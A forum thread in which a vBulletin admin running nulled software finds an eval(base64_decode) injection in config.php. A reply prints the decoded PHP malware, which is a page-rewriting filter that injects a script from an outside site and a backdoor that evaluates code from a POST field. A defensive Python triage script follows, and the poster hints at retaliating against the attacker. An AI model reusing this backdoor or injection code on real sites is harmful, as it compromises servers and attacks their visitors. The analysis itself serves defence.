Hello, I have a forum, and I installed vBulletin 3.8.4 nulled by DGT on it... It was working great, but after a couple of days the forum shut down with this error on the home page:

```
Fatal error: Cannot redeclare kch() (previously declared in /home/gongring/public_html/index.php(1) : eval()'d code:1) in /home/gongring/public_html/includes/config.php(1) : eval()'d code on line 1
```

and an error like it in the admin control panel too. Besides, when I checked the config.php file, I found it had been edited somehow and this code had been added to it!!

```php
<?php eval(base64_decode('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')); ?>
```

So I wonder: was this new function that causes the error added by a hacker? Or was this vBulletin version just not nulled very well and the function was generated by the forum files themselves, or maybe the files were edited somehow by the vBulletin team to disable the forum?? Please, any ideas about the reason for this error and the reason for the edited files??? Thanks
The evaled code is the following:

```php
<?php
if(!isset($kch1)){
// Output-buffer callback: rewrites the page HTML before it is sent
function kch($s){
  // Strip <script> blocks over 5 lines long that look obfuscated
  if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
    foreach($a[0] as $v)
      if(count(explode("\n",$v))>5){
        $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
        if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
          $s=str_replace($v,'',$s);}
  // Strip hidden iframes (width 0/1 or display:none)
  if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
    foreach($a[0] as $v)
      if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
        $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
  // Remove any existing copy of its own tag, then insert it before <body (or append it)
  $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnVtLnBocCA+PC9zY3JpcHQ+'),'',$s);
  if(stristr($s,'<body'))
    $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
  elseif(strpos($s,',a'))
    $s.=$a;
  return $s;}
// Installed as the error handler: re-stacks the output buffers so that kch filters the output
function kch2($a,$b,$c,$d){
  global $kch1;
  $s=array();
  if(function_exists($kch1))call_user_func($kch1,$a,$b,$c,$d);
  foreach(@ob_get_status(1) as $v)
    if(($a=$v['name'])=='kch')return;
    elseif($a=='ob_gzhandler')break;
    else $s[]=array($a=='default output handler'?false:$a);
  for($i=count($s)-1;$i>=0;$i--){
    $s[$i][1]=ob_get_contents();
    ob_end_clean();}
  ob_start('kch');
  for($i=0;$i<count($s);$i++){
    ob_start($s[$i][0]);
    echo $s[$i][1];}
}
}
$kchl=(($a=@set_error_handler('kch2'))!='kch2')?$a:0;
// Evaluates base64-encoded PHP taken from the POST field 'e'
eval(base64_decode($_POST['e']));
?>
```

The last line seems to be some kind of backdoor. The other lines seem to be playing with the output and modifying it.

```php
base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnVtLnBocCA+PC9zY3JpcHQ+')
```

is equivalent to

```
<script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>
```

So it's up to you to decide what to do. Don't open this script.
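
A static triage pass for the kind of injection discussed in this thread, as an added example that is not part of any post: it decodes each `eval(base64_decode('...'))` wrapper found in a PHP file without executing it and reports the traits the answer above points out (an eval fed from the request, a replaced error handler, an output-buffer callback, and nested base64 strings with their URLs). The function names, indicator labels and the `injected.example` sample are assumptions constructed for illustration.

```python
import base64
import re

# The wrapper found in the infected config.php: eval(base64_decode('...'))
WRAPPER = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1")
# Quoted base64 literals that the decoded layer decodes again
INNER = re.compile(r"base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=]{16,})\1")
URL = re.compile(r"https?://[^\s'\"<>]+")
INDICATORS = {  # labels are this example's own naming
    "request-controlled eval": re.compile(
        r"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "error handler replaced": re.compile(r"\bset_error_handler\s*\("),
    "output buffer callback": re.compile(r"\bob_start\s*\(\s*['\"]"),
}

def _decode(b64_text):
    """Base64-decode to text; the result is only inspected, never evaluated."""
    try:
        return base64.b64decode(b64_text).decode("latin-1")
    except ValueError:  # binascii.Error (bad padding) is a ValueError
        return None

def triage(php_source):
    """Return one finding per eval(base64_decode('...')) wrapper in php_source."""
    findings = []
    for match in WRAPPER.finditer(php_source):
        layer = _decode(match.group(2))
        if layer is None:
            continue
        embedded = [d for d in (_decode(m.group(2)) for m in INNER.finditer(layer)) if d]
        findings.append({
            "offset": match.start(),
            "indicators": sorted(n for n, rx in INDICATORS.items() if rx.search(layer)),
            "embedded": embedded,
            "urls": URL.findall(layer + "\n" + "\n".join(embedded)),
        })
    return findings

def constructed_sample():
    """Constructed stand-in with the same shape as the thread's payload (inert text)."""
    tag = base64.b64encode(b"<script src=http://injected.example/a.php ></script>").decode()
    layer = ("function f($s){return $s.base64_decode('%s');} ob_start('f'); "
             "set_error_handler('g'); eval(base64_decode($_POST['e']));" % tag)
    return "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(layer.encode()).decode()

if __name__ == "__main__":
    for finding in triage(constructed_sample()):
        print(finding)
```

To check a real file, pass its contents to `triage()`; a clean file returns an empty list.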
Well, when I decoded the eval code I saw the function too, and that is why I posted this thread, because I couldn't understand why someone would put just a function into the forum files when there was no hack index or anything like that, and I thought it was some kind of disabling by the vBulletin team!! But now it seems like a damn hacker is on my server and he is using shells to read and edit the files with this backdoor to gain traffic for his site, and that is why he didn't put up a hack index. Thanks bro for the reply, and now I will code a little surprise for him that I am sure he will not like at all.
BEST ANSWER YET! Any other help is just supporting thieves... If you do not want to pay for your software, buy FREEware.